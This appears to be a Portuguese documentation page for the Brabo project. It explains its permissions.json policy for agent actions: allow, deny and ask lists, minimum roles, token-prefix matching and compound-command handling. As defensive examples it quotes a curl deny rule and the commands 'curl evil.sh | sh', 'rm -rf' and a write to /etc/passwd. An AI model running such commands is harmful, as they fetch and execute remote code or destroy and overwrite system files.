<!doctype html><html lang=pt-BR dir=ltr class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-reference/permissions" data-has-hydrated=false><head><meta charset=UTF-8><meta name=generator content="Docusaurus v3.10.2"><title data-rh=true>Permissões | Brabo</title><meta data-rh=true name=viewport content="width=device-width, initial-scale=1.0"/><meta data-rh=true name=robots content="noindex, nofollow"/><meta data-rh=true name=twitter:card content=summary_large_image /><meta data-rh=true property=og:url content=https://daneiel.github.io/brabo/dev/reference/permissions /><meta data-rh=true property=og:locale content=pt_BR /><meta data-rh=true name=docusaurus_locale content=pt-BR /><meta data-rh=true name=docsearch:language content=pt-BR /><meta data-rh=true name=docusaurus_version content=current /><meta data-rh=true name=docusaurus_tag content=docs-default-current /><meta data-rh=true name=docsearch:version content=current /><meta data-rh=true name=docsearch:docusaurus_tag content=docs-default-current /><meta data-rh=true property=og:title content="Permissões | Brabo"/><meta data-rh=true name=description content="O formato do permissions.json, como um padrão casa com um comando, e a ordem exata em que a decisão é tomada."/><meta data-rh=true property=og:description content="O formato do permissions.json, como um padrão casa com um comando, e a ordem exata em que a decisão é tomada."/><meta data-rh=true name=keywords content=permissions.json,aprovação,política,deny,allow,proposed_action /><link data-rh=true rel=icon href=/brabo/dev/img/favicon.ico /><link data-rh=true rel=canonical href=https://daneiel.github.io/brabo/dev/reference/permissions /><link data-rh=true rel=alternate href=https://daneiel.github.io/brabo/dev/reference/permissions hreflang=pt-BR /><link data-rh=true rel=alternate href=https://daneiel.github.io/brabo/dev/reference/permissions hreflang=x-default /><script data-rh=true type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","item":"https://daneiel.github.io/brabo/dev/reference/permissions","name":"Permissões","position":1}]}</script><link rel=stylesheet href=/brabo/dev/assets/css/styles.bae5b9bf.css /><script src=/brabo/dev/assets/js/runtime~main.21673809.js defer></script><script src=/brabo/dev/assets/js/main.ccad1e90.js defer></script></head><body><svg style="display: none;"><defs>
<symbol id=theme-svg-external-link viewBox="0 0 24 24"><path fill=currentColor d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme-73f")}catch(t){}}();document.documentElement.setAttribute("data-theme",t||(window.matchMedia("(prefers-color-scheme: dark)").matches?"dark":"light")),document.documentElement.setAttribute("data-theme-choice",t||"system")}(),function(){try{for(var[t,e]of new URLSearchParams(window.location.search).entries())if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id=__docusaurus><link rel=preload as=image href=/brabo/dev/img/logo.svg /><div role=region aria-label="Pular para o conteúdo principal"><a class=skipToContent_aRZD href=#__docusaurus_skipToContent_fallback>Pular para o conteúdo principal</a></div><nav aria-label="Navegação principal" class="theme-layout-navbar navbar navbar--fixed-top"><div class=navbar__inner><div class="theme-layout-navbar-left navbar__items"><button aria-label="Alternar painel de navegação" aria-expanded=false class="navbar__toggle clean-btn" type=button><svg width=30 height=30 viewBox="0 0 30 30" aria-hidden=true><path stroke=currentColor stroke-linecap=round stroke-miterlimit=10 stroke-width=2 d="M4 7h22M4 15h22M4 23h22"/></svg></button><a class=navbar__brand href=/brabo/dev/><div class=navbar__logo><img src=/brabo/dev/img/logo.svg alt=Brabo class="themedComponent_BSiW themedComponent--light_TNiM"/><img src=/brabo/dev/img/logo.svg alt=Brabo class="themedComponent_BSiW themedComponent--dark__fCd"/></div><b class="navbar__title text--truncate">Brabo</b></a><a aria-current=page class="navbar__item navbar__link navbar__link--active" href=/brabo/dev/>Documentação</a><a class="navbar__item navbar__link" href=/brabo/dev/runbook>Runbook</a><a class="navbar__item navbar__link" href=/brabo/dev/adr>ADRs</a></div><div class="theme-layout-navbar-right navbar__items navbar__items--right"><a href=https://github.com/daneiel/brabo target=_blank rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><div class="toggle_B7FD colorModeToggle_i51f"><button class="clean-btn toggleButton_iBXZ toggleButtonDisabled_g7aN" type=button disabled title="modo do sistema" aria-label="Mudar entre modo claro e escuro (modo do sistema está ativo)"><svg viewBox="0 0 24 24" width=24 height=24 aria-hidden=true class="toggleIcon_NE6f lightToggleIcon_IoAw"><path fill=currentColor d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"/></svg><svg viewBox="0 0 24 24" width=24 height=24 aria-hidden=true class="toggleIcon_NE6f darkToggleIcon_CFpV"><path fill=currentColor d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"/></svg><svg viewBox="0 0 24 24" width=24 height=24 aria-hidden=true class="toggleIcon_NE6f systemToggleIcon_FD32"><path fill=currentColor d="m12 21c4.971 0 9-4.029 9-9s-4.029-9-9-9-9 4.029-9 9 4.029 9 9 9zm4.95-13.95c1.313 1.313 2.05 3.093 2.05 4.95s-0.738 3.637-2.05 4.95c-1.313 1.313-3.093 2.05-4.95 2.05v-14c1.857 0 3.637 0.737 4.95 2.05z"/></svg></button></div><div class=navbarSearchContainer_H1qa><div class="navbar__search searchBarContainer_E7mJ" dir=ltr><input placeholder=Search aria-label=Search class="navbar__search-input searchInput_Fmbc" value="" /><div class="loadingRing_yYGt searchBarLoadingRing_TCpJ"><div></div><div></div><div></div><div></div></div></div></div></div></div><div role=presentation class=navbar-sidebar__backdrop></div></nav><div id=__docusaurus_skipToContent_fallback class="theme-layout-main main-wrapper mainWrapper_sSUF"><div class=docsWrapper__5pg><button aria-label="Voltar para o topo" class="clean-btn theme-back-to-top-button backToTopButton_woZa" type=button></button><div class=docRoot_jND2><aside class="theme-doc-sidebar-container docSidebarContainer_tVYW"><div class=sidebarViewport_gVXc><div class=sidebar_vRsD><nav aria-label="Painel lateral de documentos" class="menu thin-scrollbar menu_IacH"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/><span class=categoryLinkLabel_U9or>🚀 Comece aqui</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/><span class=linkLabel_pWVb>Introdução</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/getting-started><span class=linkLabel_pWVb>Primeiros passos</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/architecture><span class=categoryLinkLabel_U9or>🏗️ Arquitetura</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/architecture><span class=linkLabel_pWVb>Arquitetura</span></a><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist" tabindex=0 href=/brabo/dev/adr><span class=categoryLinkLabel_U9or>Decisões (ADR)</span></a><button aria-label="Expandir a categoria 'Decisões (ADR)'" aria-expanded=false type=button class="clean-btn menu__caret"></button></div></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/business-rules><span class=categoryLinkLabel_U9or>📐 Regras</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/business-rules><span class=linkLabel_pWVb>Regras de negócio</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role=button aria-expanded=true href=/brabo/dev/reference/configuration><span class=categoryLinkLabel_U9or>📖 Referência</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/configuration><span class=linkLabel_pWVb>Configuração</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/events><span class=linkLabel_pWVb>Eventos</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link menu__link--active" aria-current=page tabindex=0 href=/brabo/dev/reference/permissions><span class=linkLabel_pWVb>Permissões</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/artifacts><span class=linkLabel_pWVb>Artefatos</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/git-providers><span class=linkLabel_pWVb>Providers de git</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/internal-api><span class=linkLabel_pWVb>API interna</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/scripts><span class=linkLabel_pWVb>Scripts</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/reference/rulesets><span class=linkLabel_pWVb>Rulesets</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/security-surface><span class=linkLabel_pWVb>Superfície exposta da api</span></a><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=false tabindex=0 href=/brabo/dev/reference/api/brabo-api><span class=categoryLinkLabel_U9or>Referência da API</span></a></div></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/explanation/documentation-workflow><span class=categoryLinkLabel_U9or>💡 Explicação</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/documentation-workflow><span class=linkLabel_pWVb>Sincronização de docs</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/branching-policy><span class=linkLabel_pWVb>Política de branches</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/observability><span class=linkLabel_pWVb>Observabilidade</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/primeiro-dogfooding><span class=linkLabel_pWVb>Primeiro dogfooding</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/execucao-real-hello-world><span class=linkLabel_pWVb>Execução real (hello world)</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/achados-execucao-real><span class=linkLabel_pWVb>Achados da execução real da esteira</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/backlog><span class=linkLabel_pWVb>Backlog triado</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/validacao-fase-12><span class=linkLabel_pWVb>Validação da Fase 12</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/validacao-real><span class=linkLabel_pWVb>Validação real (13b)</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/aceite-providers><span class=linkLabel_pWVb>Aceite dos providers</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/explanation/gates><span class=linkLabel_pWVb>Os gates, e como eles são medidos</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/runbook><span class=categoryLinkLabel_U9or>🛠️ Operação</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/runbook><span class=linkLabel_pWVb>Runbook</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/glossary><span class=categoryLinkLabel_U9or>📚 Vocabulário</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/glossary><span class=linkLabel_pWVb>Glossário</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a href=https://github.com/daneiel/brabo/blob/dev/CONTRIBUTING.md target=_blank rel="noopener noreferrer" class="categoryLink_IUOB menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true><span class=categoryLinkLabel_U9or>🤝 Contribuir</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a href=https://github.com/daneiel/brabo/blob/dev/CONTRIBUTING.md target=_blank rel="noopener noreferrer" class="menu__link menuExternalLink_HSqD" tabindex=0><span class=linkLabel_pWVb>Como contribuir</span><svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a href=https://github.com/daneiel/brabo/blob/dev/SUPPORT.md target=_blank rel="noopener noreferrer" class="menu__link menuExternalLink_HSqD" tabindex=0><span class=linkLabel_pWVb>Onde pedir ajuda</span><svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a href=https://github.com/daneiel/brabo/blob/dev/SECURITY.md target=_blank rel="noopener noreferrer" class="menu__link menuExternalLink_HSqD" tabindex=0><span class=linkLabel_pWVb>Reportar vulnerabilidade</span><svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a></ul></ul></nav></div></div></aside><main class=docMainContainer_SmZv><div class="container padding-top--md padding-bottom--lg"><div class=row><div class="col docItemCol_XH1Q"><div class=docItemContainer_uk13><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_g2_L" aria-label=Trilha><ul class=breadcrumbs><li class=breadcrumbs__item><a aria-label="Página Inicial" class=breadcrumbs__link href=/brabo/dev/><svg viewBox="0 0 24 24" class=breadcrumbHomeIcon_ILC1><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill=currentColor /></svg></a><li class=breadcrumbs__item><span class=breadcrumbs__link>📖 Referência</span><li class="breadcrumbs__item breadcrumbs__item--active"><span class=breadcrumbs__link>Permissões</span></ul></nav><div class="tocCollapsible_sC5p theme-doc-toc-mobile tocMobile_jNpd"><button type=button class="clean-btn tocCollapsibleButton_sMs7">Nesta página</button></div><div class="theme-doc-markdown markdown"><div class=row><div class="col col--12 markdown"><header><h1>Permissões</h1></header>
<p>Toda ação com efeito externo nasce como <code>proposed_action</code> e passa por aqui
antes de executar. Esta página é o formato e a semântica exata — as regras em
si estão em <a class="" href=/brabo/dev/business-rules#rn-004>Regras de negócio</a>.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=o-arquivo>O arquivo<a href=#o-arquivo class=hash-link aria-label="Link direto para O arquivo" title="Link direto para O arquivo" translate=no>​</a></h2>
<p><code>permissions.json</code> fica na <strong>raiz do workspace do projeto</strong> — é um arquivo de
verdade no disco, versionável, não uma coluna no banco.</p>
<div class="language-json codeBlockContainer_VI6N theme-code-block" style=--prism-color:#F8F8F2;--prism-background-color:#282A36><div class=codeBlockContent_Ph5s><pre tabindex=0 class="prism-code language-json codeBlock_o5bC thin-scrollbar" style=color:#F8F8F2;background-color:#282A36><code class=codeBlockLines_m_R9><div class=token-line style=color:#F8F8F2><span class="token punctuation" style="color:rgb(248, 248, 242)">{</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">  </span><span class="token property">"allow"</span><span class="token operator">:</span><span class="token plain"> </span><span class="token punctuation" style="color:rgb(248, 248, 242)">[</span><span class="token string" style="color:rgb(255, 121, 198)">"Terminal(pnpm test:*)"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">,</span><span class="token plain"> </span><span class="token string" style="color:rgb(255, 121, 198)">"Terminal(git status)"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">]</span><span class="token punctuation" style="color:rgb(248, 248, 242)">,</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">  </span><span class="token property">"deny"</span><span class="token operator">:</span><span class="token plain">  </span><span class="token punctuation" style="color:rgb(248, 248, 242)">[</span><span class="token string" style="color:rgb(255, 121, 198)">"Terminal(curl:*)"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">]</span><span class="token punctuation" style="color:rgb(248, 248, 242)">,</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">  </span><span class="token property">"ask"</span><span class="token operator">:</span><span class="token plain">   </span><span class="token punctuation" style="color:rgb(248, 248, 242)">[</span><span class="token string" style="color:rgb(255, 121, 198)">"GitPush()"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">]</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain"></span><span class="token punctuation" style="color:rgb(248, 248, 242)">}</span><br/></div></code></pre></div></div>
<p>Três listas, três significados:</p>





















<table><thead><tr><th>lista<th>significa<tbody><tr><td><code>allow</code><td><code>auto_approve</code> — a ação executa sem perguntar<tr><td><code>deny</code><td><code>deny</code> — recusada, e nada reverte isso<tr><td><code>ask</code><td><code>require_approval</code> — vai para a fila de aprovação</table>
<p>Nenhuma lista bate? A ação fica <code>pending</code> por default. <strong>A ausência de regra
nunca vira permissão.</strong></p>
<h3 class="anchor anchorTargetStickyNavbar_URsz" id=com-qual-credencial-a-ação-auto-aprovada-executa>Com qual credencial a ação auto-aprovada executa<a href=#com-qual-credencial-a-ação-auto-aprovada-executa class=hash-link aria-label="Link direto para Com qual credencial a ação auto-aprovada executa" title="Link direto para Com qual credencial a ação auto-aprovada executa" translate=no>​</a></h3>
<p><code>auto_approve</code> significa que <strong>ninguém decidiu</strong> — <code>proposed_actions.decided_by</code>
fica <code>NULL</code>. Isso importa para quem executa: uma ação de git contra provider
remoto precisa de token, e "o token de quem decidiu" não existe neste caminho.</p>
<p>A resposta é o <strong>owner do workspace</strong> (<a class="" href=/brabo/dev/business-rules#rn-082>RN-082</a>),
o mesmo da chave de LLM (<a class="" href=/brabo/dev/business-rules#rn-058>RN-058</a>) — quem banca a
conta banca os agentes, e isso não muda conforme quem clica.</p>
<p>Vale saber porque a alternativa falha em silêncio: enquanto a api resolvia por
<code>decided_by</code>, <strong>toda PR auto-aprovada em repositório remoto morria</strong> com
<code>Requires authentication</code>, e só quando um humano clicava em cada uma é que o
caminho funcionava — exatamente a escada que a autonomia existe para evitar.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=o-formato-do-padrão>O formato do padrão<a href=#o-formato-do-padrão class=hash-link aria-label="Link direto para O formato do padrão" title="Link direto para O formato do padrão" translate=no>​</a></h2>
<div class="language-text codeBlockContainer_VI6N theme-code-block" style=--prism-color:#F8F8F2;--prism-background-color:#282A36><div class=codeBlockContent_Ph5s><pre tabindex=0 class="prism-code language-text codeBlock_o5bC thin-scrollbar" style=color:#F8F8F2;background-color:#282A36><code class=codeBlockLines_m_R9><div class=token-line style=color:#F8F8F2><span class="token plain">Rótulo(conteúdo)</span><br/></div></code></pre></div></div>
<p>O rótulo é o tipo de ação em PascalCase. O conteúdo só é usado para
<code>Terminal</code>; nos outros tipos ele precisa estar <strong>vazio</strong> — <code>GitPush()</code> casa
qualquer push, e <code>GitPush(algo)</code> não casa nada.</p>





















































































<table><thead><tr><th>tipo de ação<th>rótulo<th>papel mínimo<tbody><tr><td><code>terminal</code><td><code>Terminal</code><td>developer<tr><td><code>git_commit</code><td><code>GitCommit</code><td>developer<tr><td><code>write_file</code><td><code>WriteFile</code><td>developer<tr><td><code>git_push</code><td><code>GitPush</code><td>maintainer<tr><td><code>pr_open</code><td><code>PrOpen</code><td>maintainer<tr><td><code>git_repo_create</code><td><code>GitRepoCreate</code><td>maintainer<tr><td><code>git_branch_create</code><td><code>GitBranchCreate</code><td>maintainer<tr><td><code>git_branch_protect</code><td><code>GitBranchProtect</code><td>maintainer<tr><td><code>open_adr_pr</code><td><code>OpenAdrPr</code><td>maintainer<tr><td><code>open_infra_pr</code><td><code>OpenInfraPr</code><td>maintainer<tr><td><code>git_merge</code><td><code>GitMerge</code><td>maintainer<tr><td><code>instruction_patch</code><td><code>InstructionPatch</code><td>maintainer<tr><td><code>parallelize</code><td><code>Parallelize</code><td>maintainer<tr><td><code>raise_max_parallel</code><td><code>RaiseMaxParallel</code><td>maintainer<tr><td><code>spend</code><td><code>Spend</code><td><strong>owner</strong></table>
<p>O papel mínimo é verificado <strong>antes</strong> do arquivo. Sem ele, <code>deny</code> — o
<code>permissions.json</code> não consegue conceder o que o IAM nega</p>
<p><code>parallelize</code> (FASE 14d) é a única cujo efeito não é tocar em código ou
repositório: ela pede mais AGENTES. Está em <code>maintainer</code> pelo mesmo motivo de
<code>spend</code> — quem autoriza custo é quem responde pelo projeto. Ela só existe acima
do teto do lead; dentro dele não há ação, porque não há o que decidir
(<a class="" href=/brabo/dev/business-rules#rn-083>RN-083</a>)
(<a class="" href=/brabo/dev/business-rules#rn-005>RN-005</a>).</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=como-um-padrão-casa-com-um-comando>Como um padrão casa com um comando<a href=#como-um-padrão-casa-com-um-comando class=hash-link aria-label="Link direto para Como um padrão casa com um comando" title="Link direto para Como um padrão casa com um comando" translate=no>​</a></h2>
<p>Não por substring. O comando é tokenizado com regras de shell e o padrão casa
por <strong>prefixo de tokens</strong>:</p>



































<table><thead><tr><th>padrão<th>comando<th>casa?<tbody><tr><td><code>Terminal(pnpm test)</code><td><code>pnpm test</code><td>✅<tr><td><code>Terminal(pnpm test)</code><td><code>pnpm test --watch</code><td>✅ (prefixo)<tr><td><code>Terminal(pnpm test)</code><td><code>pnpm build</code><td>❌<tr><td><code>Terminal(pnpm test:*)</code><td><code>pnpm test:unit</code><td>✅ (<code>*</code> no fim do token)<tr><td><code>Terminal(rm)</code><td><code>sudo rm -rf x</code><td>❌ — <code>rm</code> não é o primeiro token</table>
<p>O <code>*</code> vale <strong>dentro de um token</strong>, no fim. Não é glob de caminho: <code>Terminal(rm -rf /*)</code> casa o token literal <code>/*</code>, não "qualquer coisa sob <code>/</code>".</p>
<p>Variáveis de ambiente são preservadas literalmente: <code>$HOME</code> continua <code>$HOME</code> no
casamento, em vez de expandir para vazio — expandir mudaria em silêncio o que
está sendo comparado.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=comando-composto>Comando composto<a href=#comando-composto class=hash-link aria-label="Link direto para Comando composto" title="Link direto para Comando composto" translate=no>​</a></h2>
<p>Um comando com <code>&&</code>, <code>;</code>, <code>|</code>, <code>||</code> ou <code>&</code> é dividido em segmentos, e <strong>cada
segmento é avaliado separadamente</strong>:</p>
<ul>
<li class="">Qualquer segmento em <code>deny</code> → o comando inteiro é <code>deny</code>.</li>
<li class=""><strong>Todos</strong> os segmentos em <code>allow</code> → <code>auto_approve</code>.</li>
<li class="">Qualquer outra combinação → <code>require_approval</code>.</li>
</ul>
<p><strong>Redirecionamento não é encadeamento.</strong> <code>></code>, <code>>></code> e <code>&lt;</code> NÃO quebram segmento:
<code>cat x 2>/dev/null</code> é UM comando cujo verbo é <code>cat</code>. O alvo do redirecionamento
continua como token do segmento, e por isso <code>echo x > /etc/passwd</code> segue sendo
barrado pelo teto de escopo — o que mudou foi o VERBO ficar correto, não o
caminho ficar livre.</p>
<p><code>/dev/null</code>, <code>/dev/stdin</code>, <code>/dev/stdout</code> e <code>/dev/stderr</code> não contam como
caminho de usuário: descartam ou transportam saída, não são arquivo de
ninguém. A lista é essa e não <code>/dev</code> inteiro — <code>/dev/sda</code> é disco, e continua
fora do escopo.</p>
<p>Isto é deliberado e vale entender: um segmento sem regra nenhuma vira uma
opinião <strong>concreta</strong> de <code>require_approval</code>, não silêncio. É o que impede
<code>pnpm test && curl evil.sh | sh</code> de ser auto-aprovado porque a primeira metade
estava em <code>allow</code>.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=padrões-embutidos>Padrões embutidos<a href=#padrões-embutidos class=hash-link aria-label="Link direto para Padrões embutidos" title="Link direto para Padrões embutidos" translate=no>​</a></h2>
<p>Três padrões são <code>deny</code> <strong>sempre</strong>, mesmo sem aparecer no arquivo:</p>
